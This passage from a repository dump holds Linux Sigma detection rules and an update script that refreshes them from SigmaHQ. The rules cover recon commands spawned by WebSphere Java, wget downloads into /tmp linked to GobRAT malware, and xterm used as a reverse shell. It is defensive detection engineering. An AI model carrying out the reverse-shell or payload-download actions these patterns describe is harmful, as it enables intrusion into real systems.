just guessing 31 | ParentCommandLine|contains|all: 32 | - '/bin/java' 33 | - 'websphere' 34 | sub_processes: 35 | Image|endswith: 36 | - '/whoami' 37 | - '/ifconfig' 38 | - '/ip' 39 | - '/bin/uname' 40 | - '/bin/cat' 41 | - '/bin/crontab' 42 | - '/hostname' 43 | - '/iptables' 44 | - '/netstat' 45 | - '/pwd' 46 | - '/route' 47 | condition: 1 of selection_* and sub_processes 48 | falsepositives: 49 | - Web applications that invoke Linux command line tools 50 | level: high 51 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml: -------------------------------------------------------------------------------- 1 | title: Download File To Potentially Suspicious Directory Via Wget 2 | id: cf610c15-ed71-46e1-bdf8-2bd1a99de6c4 3 | status: experimental 4 | description: Detects the use of wget to download content to a suspicious directory 5 | references: 6 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 7 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 8 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 9 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 10 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 11 | date: 2023/06/02 12 | tags: 13 | - attack.command_and_control 14 | - attack.t1105 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection_img: 20 | Image|endswith: '/wget' 21 | selection_output: 22 | - CommandLine|re: '\s-O\s' # We use regex to ensure a case sensitive argument detection 23 | - CommandLine|contains: '--output-document' 24 | selection_path: 25 | CommandLine|contains: '/tmp/' 26 | condition: all of selection_* 27 | falsepositives: 28 | - Unknown 29 | level: medium 30 | -------------------------------------------------------------------------------- 
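/rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml: -------------------------------------------------------------------------------- 1 | title: Potential Xterm Reverse Shell 2 | id: 4e25af4b-246d-44ea-8563-e42aacab006b 3 | status: experimental 4 | description: Detects usage of "xterm" as a potential reverse shell tunnel 5 | references: 6 | - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 7 | - https://www.revshells.com/ 8 | author: '@d4ns4n_' 9 | date: 2023/04/24 10 | tags: 11 | - attack.execution 12 | - attack.t1059 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|contains: 'xterm' 19 | CommandLine|contains: '-display' 20 | CommandLine|endswith: ':1' 21 | condition: selection 22 | falsepositives: 23 | - Unknown 24 | level: medium 25 | -------------------------------------------------------------------------------- /update-rules.sh: --------------------------------------------------------------------------------
#!/usr/bin/env sh
# Refresh ./rules/ from the upstream SigmaHQ repository.
#
# The existing rule set is only removed after the clone has succeeded and
# has been checked to contain rules/linux, so a failed or partial download
# (network error, moved repository, leftover ./sigma/ directory) never
# leaves the tool with an empty ./rules/. The upstream commit the rules
# were taken from is printed so the deployed rule set is traceable.
#
# SIGMA_REPO may be set in the environment to fetch from a mirror instead
# of the default upstream URL.
set -eu

SIGMA_REPO="${SIGMA_REPO:-https://github.com/SigmaHQ/sigma.git}"
work_dir="$(mktemp -d)"

# Remove the scratch clone on every exit path, including an aborted run.
cleanup() { rm -rf "$work_dir"; }
trap cleanup EXIT
trap 'exit 1' INT TERM

echo 'updating sigma rules started'

# Shallow clone: only the current tree is needed, not the full history.
git clone --depth 1 "$SIGMA_REPO" "$work_dir/sigma"

# Refuse to replace the current rules if upstream no longer ships rules/linux.
if [ ! -d "$work_dir/sigma/rules/linux" ]; then
    echo 'error: rules/linux not found in the cloned repository; keeping current rules' >&2
    exit 1
fi

echo "fetched sigma rules at commit $(git -C "$work_dir/sigma" rev-parse HEAD)"

# Only now is it safe to drop the old rule set; -f so a missing ./rules/
# does not abort the script under set -e.
rm -rf ./rules/
mkdir ./rules/
mv "$work_dir/sigma/rules/linux/" ./rules/
echo 'updating sigma rules done'
--------------------------------------------------------------------------------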